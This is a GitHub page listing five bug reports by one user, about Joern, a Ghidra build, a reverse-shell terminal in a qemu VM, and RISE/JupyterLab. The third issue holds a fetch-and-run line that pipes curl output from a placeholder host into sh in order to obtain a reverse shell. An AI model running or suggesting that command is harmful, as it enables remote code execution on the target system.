Lemuel Lew

Results 5 issues of Lemuel Lew

![image](https://user-images.githubusercontent.com/59448437/161925302-c68a0bdc-3833-4f5c-9379-a557a84c6015.png) ``` java.nio.file.NoSuchFileException: ***/cpg.bin sun.nio.fs.UnixException.translateToIOException(UnixException.java:92) sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:111) sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:116) sun.nio.fs.UnixCopyFile.copy(UnixCopyFile.java:548) sun.nio.fs.UnixFileSystemProvider.copy(UnixFileSystemProvider.java:258) java.nio.file.Files.copy(Files.java:1295) better.files.File.copyTo(File.scala:1060) better.files.Dsl$.cp(Dsl.scala:79) io.joern.console.workspacehandling.WorkspaceManager.openProject(WorkspaceManager.scala:270) io.joern.console.Console.open(Console.scala:178) io.joern.console.cpgcreation.ImportCode.$anonfun$apply$6(ImportCode.scala:133) scala.Option.flatMap(Option.scala:283) io.joern.console.cpgcreation.ImportCode.$anonfun$apply$5(ImportCode.scala:132) scala.Option.flatMap(Option.scala:283) io.joern.console.cpgcreation.ImportCode.io$joern$console$cpgcreation$ImportCode$$apply(ImportCode.scala:130) io.joern.console.cpgcreation.ImportCode.apply(ImportCode.scala:38) ammonite.$sess.cmd0$.(cmd0.sc:1) ```

**Describe the bug** buildGhidra error due to wrong protoc format **To Reproduce** Steps to reproduce the behavior: ```bash * What went wrong: Execution failed for task ':Debugger-gadp:generateProto'. > A problem...

Feature: Build
Status: Internal

#### Description ``` 在qemu aarch64虚拟机中反弹shell,终端存在 CR LF乱码问题 ``` #### Reproduce 1. qemu-system-aarch64虚拟机中 2. `curl http://x.x.x.x:13338/|sh` ... #### Screenshots/Terminal log ![image](https://user-images.githubusercontent.com/59448437/203046161-9e7210cf-e1db-4c4c-a877-04593725413b.png) #### Environments - OS: Ubuntu 20.04 - Version: 1.5.1

bug

I put h1 tag on the top in `rise.css`, the style lost when downloading as reveal.js slides html ```css h1 { position: fixed; top: 0; } ```

## Description render blank page ## Context --- `pyproject.toml` ```toml dependencies = [ "jupyterlab>=4.0.0", "jupyterlab-rise>=0.1.1", ] requires-python = ">=3.11" ```

bug